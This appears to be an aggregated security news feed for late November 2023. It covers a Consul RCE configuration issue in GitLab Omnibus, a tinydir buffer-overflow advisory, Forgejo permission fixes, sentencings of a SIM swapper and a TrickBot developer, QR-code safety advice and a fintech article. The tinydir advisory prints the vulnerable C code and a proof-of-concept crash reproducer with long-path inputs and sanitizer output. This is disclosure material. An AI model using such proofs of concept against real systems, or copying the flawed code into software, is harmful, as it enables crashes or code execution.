A list of topics we covered in the week of November 27 to December 3 of 2023

December 1, 2023 - Domain fronting is a technique to hide the true origin of HTTPS requests by hiding the real domain name encrypted inside a legitimate TLS request.

November 30, 2023 - A fake antivirus alert may suddenly hijack your screen while browsing. This latest malvertising campaign hit top publishers.

November 29, 2023 - Google's released an update to Chrome which includes seven security fixes. Make sure you're using the latest version!

November 28, 2023 - A vulnerability in the ownCloud file sharing app could lead to the exposure of sensitive credentials like admin passwords.

November 23, 2023 - Google has set a date for the introduction of Manifest V3 which will hurt the capabilities of many ad blockers.

 A week in security (November 27 &#8211; December 3) 

Patch in third party library Consul requires 'enable-script-checks' to be set to False. This was required to enable a patch by the vendor. Without this setting the patch could be bypassed. This only affects GitLab-EE.

Skip to content

*   *   Why GitLab
    *   Pricing
    *   Contact Sales
    *   Explore
    
*   Why GitLab
*   Pricing
*   Contact Sales
*   Explore

**Consul RCE vulnerability \`enable-script-checks\`**

**Summary**

GitLab Premium _in GitLab_ customer engaged GitLab Support to disclose the ability to exploit an RCE vulnerability in Consul, using GitLab Omnibus version v15.11.3 with Consul 1.12.5.

In 2019 there was an MR that addressed this by upgrading Consul for Omnibus: !3400 (merged)

This MR addressed the following issue: #4124 (closed)

The customer has indicated that upgrading the Consul version to a patched version is not enough to mitigate the vulnerability. Apparently we still set enable_script_checks to true by default in the Omnibus cookbook, and part of the mitigation is changing enable_script_checks to enable_local_script_checks.

**Steps to reproduce**

**Mitigation steps**

**Example Project****What is the current _bug_ behavior?****What is the expected _correct_ behavior?****Relevant logs and/or screenshots****Output of checks****Results of GitLab environment info**Expand for output related to GitLab environment info

(For installations with omnibus-gitlab package run and paste the output of:
\`sudo gitlab-rake gitlab:env:info\`)

(For installations from source run and paste the output of:
\`sudo -u git -H bundle exec rake gitlab:env:info RAILS\_ENV=production\`)

**Results of GitLab application Check**Expand for output related to the GitLab application check

(For installations with omnibus-gitlab package run and paste the output of:
sudo gitlab-rake gitlab:check SANITIZE=true)

(For installations from source run and paste the output of:
sudo -u git -H bundle exec rake gitlab:check RAILS_ENV=production SANITIZE=true)

(we will only investigate if the tests are passing)
**Possible fixes**

cc @gitlab-com/gl-security/appsec

Edited May 17, 2023 by Michael Trainor

CVE-2023-5332: Consul RCE vulnerability `enable-script-checks` (#8171) · Issues · GitLab.org / omnibus-gitlab · GitLab

TinyDir is a lightweight C directory and file reader. Buffer overflows in the `tinydir_file_open()` function. This vulnerability has been patched in version 1.2.6.

**Affected versions**

<= 1.2.5 (latest)

**Summary**

I spotted some buffer overflow vulnerabilities at the following locations in the tinydir source code:  
https://github.com/cxong/tinydir/blob/master/tinydir.h#L675-L680  
https://github.com/cxong/tinydir/blob/master/tinydir.h#L706  
https://github.com/cxong/tinydir/blob/master/tinydir.h#L711

**Details**

Buffer overflows in the tinydir_file_open() function, see marked lines below:

/\* Open a single file given its path \*/
\_TINYDIR\_FUNC
int tinydir\_file\_open(tinydir\_file \*file, const \_tinydir\_char\_t \*path)
{
	tinydir\_dir dir;
	int result \= 0;
	int found \= 0;
	\_tinydir\_char\_t dir\_name\_buf\[\_TINYDIR\_PATH\_MAX\];
	\_tinydir\_char\_t file\_name\_buf\[\_TINYDIR\_FILENAME\_MAX\];
	\_tinydir\_char\_t \*dir\_name;
	\_tinydir\_char\_t \*base\_name;
#if (defined \_MSC\_VER || defined \_\_MINGW32\_\_)
	\_tinydir\_char\_t drive\_buf\[\_TINYDIR\_PATH\_MAX\];
	\_tinydir\_char\_t ext\_buf\[\_TINYDIR\_FILENAME\_MAX\];
#endif

	if (file \== NULL || path \== NULL || \_tinydir\_strlen(path) \== 0)
	{
		errno \= EINVAL;
		return \-1;
	}
	if (\_tinydir\_strlen(path) + \_TINYDIR\_PATH\_EXTRA >= \_TINYDIR\_PATH\_MAX)
	{
		errno \= ENAMETOOLONG;
		return \-1;
	}

	/\* Get the parent path \*/
#if (defined \_MSC\_VER || defined \_\_MINGW32\_\_)
#if ((defined \_MSC\_VER) && (\_MSC\_VER >= 1400))
	errno \= \_tsplitpath\_s(
		path,
		drive\_buf, \_TINYDIR\_DRIVE\_MAX,
		dir\_name\_buf, \_TINYDIR\_FILENAME\_MAX,
		file\_name\_buf, \_TINYDIR\_FILENAME\_MAX,
		ext\_buf, \_TINYDIR\_FILENAME\_MAX);
#else
	\_tsplitpath(
		path,
		drive\_buf,
		dir\_name\_buf,
		file\_name\_buf,
		ext\_buf); // VULN: potential buffer overflow due to insecure splitpath api (https://learn.microsoft.com/en-us/cpp/c-runtime-library/reference/splitpath-wsplitpath?view=msvc-170)
#endif

	if (errno)
	{
		return \-1;
	}

/\* \_splitpath\_s not work fine with only filename and widechar support \*/
#ifdef \_UNICODE
	if (drive\_buf\[0\] \== L'\\xFEFE')
		drive\_buf\[0\] \= '\\0';
	if (dir\_name\_buf\[0\] \== L'\\xFEFE')
		dir\_name\_buf\[0\] \= '\\0';
#endif

	/\* Emulate the behavior of dirname by returning "." for dir name if it's
	empty \*/
	if (drive\_buf\[0\] \== '\\0' && dir\_name\_buf\[0\] \== '\\0')
	{
		\_tinydir\_strcpy(dir\_name\_buf, TINYDIR\_STRING("."));
	}
	/\* Concatenate the drive letter and dir name to form full dir name \*/
	\_tinydir\_strcat(drive\_buf, dir\_name\_buf);
	dir\_name \= drive\_buf;
	/\* Concatenate the file name and extension to form base name \*/
	\_tinydir\_strcat(file\_name\_buf, ext\_buf); // VULN: since sizeof(file\_name\_buf) + sizeof(ext\_buf) is larger than sizeof(file\_name\_buf), we have a potential stack buffer overflow
	base\_name \= file\_name\_buf;
#else
	\_tinydir\_strcpy(dir\_name\_buf, path);
	dir\_name \= dirname(dir\_name\_buf);
	\_tinydir\_strcpy(file\_name\_buf, path); // VULN: since sizeof(file\_name\_buf) is smaller than the maximum path length, we have a potential stack buffer overflow
	base\_name \= basename(file\_name\_buf);
#endif

	/\* Special case: if the path is a root dir, open the parent dir as the file \*/
#if (defined \_MSC\_VER || defined \_\_MINGW32\_\_)
	if (\_tinydir\_strlen(base\_name) \== 0)
#else
	if ((\_tinydir\_strcmp(base\_name, TINYDIR\_STRING("/"))) \== 0)
#endif
	{
		memset(file, 0, sizeof \* file);
		file\->is\_dir \= 1;
		file\->is\_reg \= 0;
		\_tinydir\_strcpy(file\->path, dir\_name);
		file\->extension \= file\->path + \_tinydir\_strlen(file\->path);
		return 0;
	}

	/\* Open the parent directory \*/
	if (tinydir\_open(&dir, dir\_name) \== \-1)
	{
		return \-1;
	}

	/\* Read through the parent directory and look for the file \*/
	while (dir.has\_next)
	{
		if (tinydir\_readfile(&dir, file) \== \-1)
		{
			result \= \-1;
			goto bail;
		}
		if (\_tinydir\_strcmp(file\->name, base\_name) \== 0)
		{
			/\* File found \*/
			found \= 1;
			break;
		}
		tinydir\_next(&dir);
	}
	if (!found)
	{
		result \= \-1;
		errno \= ENOENT;
	}

bail:
	tinydir\_close(&dir);
	return result;
}

**PoC**

Step-by-step instructions to replicate the third vulnerability that's present at this location:  
https://github.com/cxong/tinydir/blob/master/tinydir.h#L711

    $ git clone https://github.com/cxong/tinydir
    $ cd tinydir/samples/
    $ gcc -g -fsanitize=address -I.. file_open_sample.c -o file_open_sample
    $ mkdir -p AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/
    $ ./file_open_sample AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    Path: ./AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    Extension: 
    Is dir? yes
    Is regular file? no
    $ ./file_open_sample AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/
    =================================================================
    ==2533==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffd1ecabeb0 at pc 0x7f37b22544bf bp 0x7ffd1ecaac10 sp 0x7ffd1ecaa3b8
    WRITE of size 513 at 0x7ffd1ecabeb0 thread T0
        #0 0x7f37b22544be in __interceptor_strcpy ../../../../src/libsanitizer/asan/asan_interceptors.cpp:440
        #1 0x5625cf301b69 in tinydir_file_open ../tinydir.h:711
        #2 0x5625cf3021f4 in main /home/raptor/tinydir/samples/file_open_sample.c:12
        #3 0x7f37b1e29d8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
        #4 0x7f37b1e29e3f in __libc_start_main_impl ../csu/libc-start.c:392
        #5 0x5625cf3004e4 in _start (/home/raptor/tinydir/samples/file_open_sample+0x24e4)
    
    Address 0x7ffd1ecabeb0 is located in stack of thread T0 at offset 4704 in frame
        #0 0x5625cf3018c3 in tinydir_file_open ../tinydir.h:641
    
      This frame has 3 object(s):
        [48, 4184) 'dir' (line 642)
        [4448, 4704) 'file_name_buf' (line 646)
        [4768, 8864) 'dir_name_buf' (line 645) <== Memory access at offset 4704 partially underflows this variable
    HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork
          (longjmp and C++ exceptions *are* supported)
    SUMMARY: AddressSanitizer: stack-buffer-overflow ../../../../src/libsanitizer/asan/asan_interceptors.cpp:440 in __interceptor_strcpy
    Shadow bytes around the buggy address:
      0x100023d8d780: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x100023d8d790: 00 00 00 00 00 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
      0x100023d8d7a0: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
      0x100023d8d7b0: f2 f2 f2 f2 f2 f2 00 00 00 00 00 00 00 00 00 00
      0x100023d8d7c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x100023d8d7d0: 00 00 00 00 00 00[f2]f2 f2 f2 f2 f2 f2 f2 00 00
      0x100023d8d7e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x100023d8d7f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x100023d8d800: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x100023d8d810: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x100023d8d820: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==2533==ABORTING
    

The other two vulnerabilities are Windows-specific. It should be possible to replicate them by crafting long paths in a similar way.

**Impact**

If the input above crosses a security boundary, the impact of the buffer overflow vulnerabilities could range from denial of service to arbitrary code execution.

CVE-2023-49287: Buffer overflow vulnerabilities in tinydir

Forgejo before 1.20.5-1 allows remote attackers to test for the existence of private user accounts by appending .rss (or another extension) to a URL.

Forgejo v1.20.5-1 was released 25 November 2023.

This release contains _critical security fixes_ related to permissions enforcement of API endpoints.

This release also contains bug fixes, as detailed in the release notes.

**Recommended Action**

We _strongly recommend_ that all Forgejo installations are upgraded to the latest version as soon as possible.

**API and web endpoint vulnerable to manually crafted identifiers**

Some API endpoints, such as adding a reaction to a comment, rely on an identifier unique to an object (a comment in this example). There are similar cases for web endpoints which are used by the Forgejo web interface.

The permissions required for the user performing the action on the repository are properly enforced. But a check was missing to ensure that the object (a comment in the example) also belongs to the repository the permissions are checked against. Without this check it is possible both to perform destructive actions and to access information in repositories unrelated to the request, including private ones.

API and web endpoints have been analysed, and those that were missing such a verification can be exploited by a malicious actor to:

*   delete releases and tags
*   delete and modify issues or pull requests comments
*   reveal the content of issues or pull requests comments from private repositories
*   perform other non-destructive actions such as creating issues, moving pinned issues, or obtaining deploy public keys

The vulnerable endpoints were fixed and tests written to verify the fix is effective.

**docker login and 2FA**

When using docker login to authenticate against a Forgejo instance using basic authentication, there needs to be an additional verification if 2FA is activated for the user. That verification was missing for the API endpoint used by docker login, thus bypassing 2FA.

**Responsible disclosure to Gitea**

On 25 October 2023 the Forgejo security team identified that multiple API and web endpoints were not protected against manually crafted identifiers, and the Gitea security team was notified. A 30-day embargo was requested, after which a patch to the v1.20 point release could be published. Further research from both Gitea and Forgejo teams in the following days revealed more vulnerabilities. Initial fixes and tests verifying they are effective were exchanged, but after their last email on 31 October 2023 the Gitea security team stopped responding. Given the severity of the vulnerability, the Forgejo security team asked again for feedback on 16 November 2023, but did not get any reply. Having exhausted all options for cooperation, the Forgejo security team completed the security fix on its own. The resulting fix which is published in this release was sent to the Gitea security team encrypted in its final version on 24 November 2023. At the time of publication, there was still no response from the Gitea security team.

**Responsible disclosure to Gogs**

The Gogs developer was notified of the vulnerability on 25 October 2023. There is no encrypted channel and only a terse but unambiguous message was sent. There has been no response.

**Forgejo will give advance warning of security releases**

Similar to what is done when a Go release contains a security fix, Forgejo will now publish advance warning of security releases. They will not reveal the details of the vulnerability but will allow Forgejo admins to plan ahead and better secure their instance. Anyone can watch to the dedicated tracker or subscribe to the RSS feed.

**Gogs and Gitea upgrades to Forgejo**

Gitea admins are reminded that Forgejo is a 100% compatible drop-in replacement for Gitea. It is enough to replace the Gitea binary or the container image with Forgejo and restart. No configuration modification is necessary. They are encouraged to choose that option to get this security fix as soon as possible.

In the absence of a security fix for Gogs, it is also possible to try and upgrade Gogs to Forgejo. Note however that such an upgrade will require manual intervention and configuration changes because the upgrade path has not been tested.

**Contribute to Forgejo**

If you have any feedback or suggestions for Forgejo, we’d love to hear from you! Open an issue on our issue tracker for feature requests or bug reports. You can also find us on the Fediverse, or drop by our Matrix space (main chat room) to say hi!

CVE-2023-49948: Forgejo Security Release 1.20.5-1

By Waqas
In addition to his prison sentence, Amir Hossein Golshan, the culprit, has been ordered to pay $1,218,526 in restitution to his victims.
This is a post from HackRead.com Read the original post: US Man Jailed 8 Years for SIM Swapping and Apple Support Impersonation

Golshan’s schemes involved SIM swapping, social media account takeovers, Zelle payment fraud, and impersonating Apple Support personnel.

A 25-year-old man from downtown Los Angeles has been sentenced to 8 years in federal prison for orchestrating a series of online scams that defrauded hundreds of victims of over $740,000.

Amir Hossein Golshan (PDF) was convicted of one count of unauthorized access to a protected computer to obtain information, one count of wire fraud, and one count of accessing a computer to defraud and obtain value.

Golshan’s schemes involved SIM swapping, social media account takeovers, Zelle payment fraud, and impersonating Apple Support personnel. He used these methods to steal money, NFTs, cryptocurrency, and other valuable digital property from his victims.

> It looks like the SIM swapper who impersonated Apple Support to steal $386K worth of crypto and NFTs (BAYC 9012) from @Mr312 last year was just sentenced to 8 years in prison + ordered to pay $1.2M in restitution.
> 
> How do we know it’s his scammer?
> 
> In the DOJ press release they… pic.twitter.com/qBrWBpROVg
> 
> — ZachXBT (@zachxbt) November 30, 2023

In one instance, Golshan targeted a Los Angeles-based model and influencer with over 100,000 Instagram followers. He gained access to her Instagram account and impersonated her to her friends, requesting them to send him money through Zelle, PayPal, and other online payment platforms.

Several of the victim’s friends sent Golshan money, totalling thousands of dollars, believing they were sending money to the victim. In another instance, Golshan impersonated Apple Support personnel to gain unauthorized access to several victims’ Apple iCloud accounts. He then stole NFTs, cryptocurrency, and other valuable digital property from these accounts.

In another case, he stole an NFT valued at approximately $319,000 and approximately $70,000 worth of cryptocurrency from a victim. U.S. District Judge Otis D. Wright II, who sentenced Golshan, stated that his crimes went “beyond just money” and that they showed a “wanton cruelty” that caused the victims to live in a state of “constant fear and worry.”

According to the US Department of Justice’s press release on Monday, November 27, 2023, Golshan has been in federal custody since June 2023 for violating the terms of his pretrial release. In addition to his prison sentence, he is ordered to pay $1,218,526 in restitution to his victims.

1.  **Police Dismantle SIM Swapping Gang in Spain**
2.  **Indian police & Microsoft busts tech support scam centers**
3.  **10 SIM-swapping hackers nabbed for targeting US celebrities**
4.  **Authorities take down scam campaign impersonating the WHO**
5.  **Man hacks Indian tech support scam call center; leaks CCTV footage**

US Man Jailed 8 Years for SIM Swapping and Apple Support Impersonation

QR codes can be convenient—but they can also be exploited by malicious actors. Here’s how to protect yourself.

And you don’t need anything special to create a QR code. The tools are widely available and straightforward to use, and putting together a QR code of your own isn’t much more difficult than scanning one. If you wanted to create a QR code that points to a website that’s been put together for malicious purposes, it would only take a couple of minutes. The QR code could then be stuck on a wall, attached to an email, or printed on a document, ready to be scanned.

The aims of these websites are the same as they’ve always been: to get you to download something that will compromise the security of your accounts or your devices, or to get you to enter some login credentials that will then be relayed straight to the hackers (most probably using a spoof site set up to look like something genuine and trustworthy). The intended end results are the same as ever, but the method of getting there is different.

Avoiding QR Code Hacks

The security precautions you should already be using are the same ones that will keep you protected against QR code hacking. Just as you would with emails or instant messages, don’t trust QR codes if you’re not sure where they’ve come from—perhaps attached to suspicious-looking emails or on websites that you can’t verify. The QR code on the menu in your local restaurant, in contrast, is highly unlikely to have been generated by hackers.

Of course, there’s always the chance that the accounts of your friends, family, and colleagues have been compromised, so you can never be 100 percent sure that a message with a QR code in it is genuine. Scams will usually try to imply a sense of urgency and alarm: Scan this QR code to verify your identity or prevent the deletion of your account or take advantage of a time-limited offer.

You should get a preview of the link you’re visiting from a QR code.

Apple via David Nield

As always, your digital accounts should be as heavily protected as possible, so that if you do fall victim to a QR code trick, safety nets are in place. Switch on two-factor authentication for every account that offers it, make sure your personal details are up to date (such as backup email addresses and phone numbers that can be used to recover your accounts), and log out of devices you’re no longer using (you should also delete old accounts you no longer have any need for).

Finally, keep your software up to date—something that’s happily now very easy to do. The latest versions of popular mobile web browsers come with built-in tech for spotting fraudulent links: These integrated protections aren’t infallible, but the more up-to-date your browser and mobile OS are, the better your chances of getting a warning on screen if you’re about to visit an unsafe location on the web.

How to Not Get Hacked by a QR Code

A Russian national has been found guilty in connection with his role in developing and deploying a malware known as TrickBot, the U.S. Department of Justice (DoJ) announced.
Vladimir Dunaev, 40, was arrested in South Korea in September 2021 and extradited to the U.S. a month later.
"Dunaev developed browser modifications and malicious tools that aided in credential harvesting and data

A Russian national has been found guilty in connection with his role in developing and deploying a malware known as TrickBot, the U.S. Department of Justice (DoJ) announced.

Vladimir Dunaev, 40, was arrested in South Korea in September 2021 and extradited to the U.S. a month later.

"Dunaev developed browser modifications and malicious tools that aided in credential harvesting and data mining from infected computers, facilitated and enhanced the remote access used by TrickBot actors, and created a program code to prevent the TrickBot malware from being detected by legitimate security software," the DoJ said.

"During Dunaev's participation in the scheme, 10 victims in the Northern District of Ohio, including Avon schools and a North Canton real-estate company, were defrauded of more than $3.4 million via ransomware deployed by TrickBot."

Dunaev, who pleaded guilty to committing computer fraud and identity theft and conspiracy to commit wire fraud and bank fraud, faces a maximum of 35 years in prison. He is scheduled to be sentenced on March 20, 2024.

Dunaev is also the second TrickBot gang malware developer to be arrested after Alla Witte, a Latvian national who, was sentenced to two years and eight months in prison in June 2023.

The development came nearly three months after the U.K. and U.S. governments sanctioned 11 individuals suspected of being part of the TrickBot cybercrime group.

TrickBot, which started off as a banking trojan in 2016, evolved into a multi-purpose tool capable of delivering additional payloads to infected hosts and acting as an initial access facilitator for ransomware attacks.

After surviving law enforcement to dismantle the botnet, the infamous Conti ransomware crew gained control over the operation. However, both Conti and TrickBot suffered a major blow last year following Russia's invasion of Ukraine, when Conti pledged allegiance to Russia.

This led to a series of leaks dubbed ContiLeaks and TrickLeaks that gave away valuable information about their internal chats and infrastructure, ultimately resulting in the shut down of Conti and its disintegration into numerous other groups.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Russian Hacker Vladimir Dunaev Convicted for Creating TrickBot Malware

A deserialization vulnerability in Jupiter v1.3.1 allows attackers to execute arbitrary commands via sending a crafted RPC request. 

**Jupiter allows attackers to execute arbitrary commands via sending a crafted RPC request**

Critical severity GitHub Reviewed Published Dec 2, 2023 to the GitHub Advisory Database • Updated Dec 7, 2023

GHSA-6pqx-v9g4-5hc8: Jupiter allows attackers to execute arbitrary commands via sending a crafted RPC request

By Owais Sultan
The financial industry is undergoing a digital transformation. Digital technology has been around for decades, but it’s only…
This is a post from HackRead.com Read the original post: Digital Transformation in the Financial Industry: The Role of Fintech

The financial industry is undergoing a digital transformation. Digital technology has been around for decades, but it’s only recently that it has become an integral part of how we conduct our finances. Many people now do most of their banking online or through mobile apps and that number is growing every year.

This isn’t surprising when you consider how much money can be saved by using technology instead of going into a branch or calling customer service over the phone (not to mention how much time is saved). But what exactly does this mean for the future?

Fintech companies are providing innovative solutions to help customers save money and manage risk more effectively than ever before; they’re also fueling innovation within traditional banks themselves by creating new products based on customer feedback or challenging existing models with newer ones that might be better suited

****The Emergence and Evolution of Fintech****

Fintech is a broad term that encompasses many different technologies and business models. It has been around for decades, but it has grown in popularity in recent years. Fintech is a global industry with investors across the world.

 Fintech companies are using technology to provide financial services at cheaper costs than traditional banks and other institutions, and they’re having an impact on how we think about money today.

****Technological Advancements Driving Fintech Innovation****

Technological advancements are driving fintech innovation, with artificial intelligence and machine learning at the forefront. These technologies are making it possible for companies to analyze large amounts of data in real-time, allowing them to make faster and better decisions.

For example, AI can help banks predict customer behaviour based on past transactions or use sentiment analysis to identify potential fraudsters before they commit crimes. For more information on cutting-edge technologies in the financial industry, you can explore top insurance software development companies here.

Blockchain technology has also become an important part of fintech innovation because it allows users to exchange value without relying on centralized institutions like banks or governments (although some argue that this could lead to an increase in trust issues).

****Fintech Startups and Disruption: Case Studies****

In this section, we will look at how fintech startups are disrupting the financial industry. We’ll also take a look at some of the most successful cases of disruption and their impact on both banks and consumers.

The importance of fintech startups in digital transformation cannot be understated. They have been responsible for creating new business models that provide better services at lower costs than traditional providers, as well as innovating ways to connect people who were previously excluded from mainstream finance because of their location or income levels.

****Collaboration and Integration: Traditional Financial Institutions and Fintech****

Collaboration and integration between traditional financial institutions and fintech companies can bring numerous benefits to both parties and the customers they serve. Here are some key points to consider:

*   **Access to Innovation:** 

Fintech companies are known for their ability to leverage new technologies and develop innovative solutions. By collaborating with fintech firms, traditional financial institutions can gain access to these cutting-edge technologies, allowing them to enhance their product offerings, streamline processes, and provide better services to their customers.

*   **Enhanced Customer Experience:** 

Fintech companies often prioritize user-centric design and user experience. By integrating fintech solutions into their operations, traditional financial institutions can improve their digital channels, making transactions faster, more convenient, and more user-friendly for their customers. This can lead to increased customer satisfaction and loyalty.

*   **Expanded Market Reach:** 

Collaboration with fintech companies can help traditional financial institutions tap into new customer segments. Fintech firms often have a strong presence in niche markets or among tech-savvy individuals who prefer digital banking solutions. By integrating fintech services, traditional financial institutions can expand their market reach and attract new customers.

*   **Improved Efficiency:** 

Fintech solutions, such as automation and artificial intelligence, can significantly improve operational efficiency for traditional financial institutions. By integrating these technologies, banks and other financial institutions can streamline their processes, reduce costs, minimize errors, and enhance risk management.

*   **Compliance and Trust:** 

Traditional financial institutions are subject to rigorous regulatory requirements. Collaborating with fintech companies can help them address these compliance challenges more effectively. Fintech firms often have expertise in regulatory technology (RegTech) and can assist in implementing robust compliance and risk management systems, thereby strengthening customer trust.

*   **Relevant Partnerships:** 

Collaboration between traditional financial institutions and fintech companies can create mutually beneficial partnerships. Fintech firms can gain access to traditional institutions’ extensive customer base and infrastructure, while traditional institutions can benefit from fintech expertise and innovation. This partnership can result in the development of new products, services, and business models beneficial to both parties.

Overall, collaboration and integration between traditional financial institutions and fintech companies have the potential to bring significant advantages, including innovation, improved customer experience, expanded market reach, operational efficiency, compliance, and relevant partnerships. It is an exciting opportunity for both sectors to leverage each other’s strengths and create a more robust and customer-centric financial ecosystem.

****Regulatory Challenges and Compliance in the Fintech Era****

 This is a topic that will be covered in depth in this guide, but let’s go over the basics here. Fintech has been around for quite some time now, so it’s safe to say that regulators have had plenty of time to catch up with the new technology and create regulations surrounding it. However, many feel as though these regulations are still not enough to keep up with how fast fintech startups are growing and they may be right!

One reason for this is that it can take years before someone becomes an expert at something; therefore it makes sense that regulators would need more time than just two or three years (which seems like ages when dealing with this kind of thing). 

****Financial Inclusion: Fintech’s Role in Bridging Gaps****

As we’ve discussed, financial inclusion is one of the biggest challenges facing the global community. More than 2 billion people do not have access to basic financial services, which means that they cannot save money or borrow money when they need it. This leaves them vulnerable to poverty and hunger, as well as other issues related to being unbanked (including higher interest rates on consumer loans).

Financial technology (fintech) companies are helping tackle this problem by making it easier for people from all walks of life whether they live in rural areas or urban centers to get access to affordable credit products like loans and savings accounts. 

****Conclusion****

We hope that this article has given you a better understanding of fintech, its role in digital transformation, and how it can help your organization adapt to changing trends in finance. Fintech is an exciting field with many opportunities for growth and innovation, but it also presents challenges due to its rapid pace of change and disruption of traditional business models.

1.  The Ultimate Guide to Price Optimization
2.  Payoro: A Glimmer of Disruption in the Banking Sector
3.  Efficiency in a Virtualized World: A Deep Dive into Modern IT
4.  Buy-Now-Pay-Later (BNPL) is Revolutionising E-Commerce Landscape

Digital Transformation in the Financial Industry: The Role of Fintech

A deserialization vulnerability in Jupiter v1.3.1 allows attackers to execute arbitrary commands via sending a crafted RPC request.

**Jupiter:**

*   Jupiter 是一款性能非常不错的, 轻量级的分布式服务框架

**Jupiter Architecture:**

           ═ ═ ═▷ init         ─ ─ ─ ▷ async       ──────▶ sync
    ----------------------------------------------------------------------------------------
    
                                ┌ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─
                                           ┌ ─ ─ ─ ┐ │
               ─ ─ ─ ─ ─ ─ ─ ─ ─│ Registry  Monitor ───────────────────────────┐
              │                            └ ─ ─ ─ ┘ │                         │
                                └ ─ ─△─ ─ ─ ─ ─△─ ─ ─                          ▼
              │                                                           ┌ ─ ─ ─ ─
            Notify                   ║         ║                            Telnet │
              │         ═ ═ ═ ═ ═ ═ ═           ═ ═ ═ ═ ═ ═ ═ ═ ═         └ ─ ─ ─ ─
                       ║                                         ║             ▲
              │    Subscribe                                  Register         │
                       ║                                         ║             │
              │  ┌ ─ ─ ─ ─ ─                          ┌ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─    │
                            │─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ▷           ┌ ─ ─ ─ ┐ │   │
              └ ▷│ Consumer           Invoke          │ Provider  Monitor ─────┘
                            │────────────────────────▶           └ ─ ─ ─ ┘ │
                 └ ─ ─ ─ ─ ─                          └ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─
    
    ---------------------------------------------------------------------------------------
    

**RELEASE-NOTES****性能:**

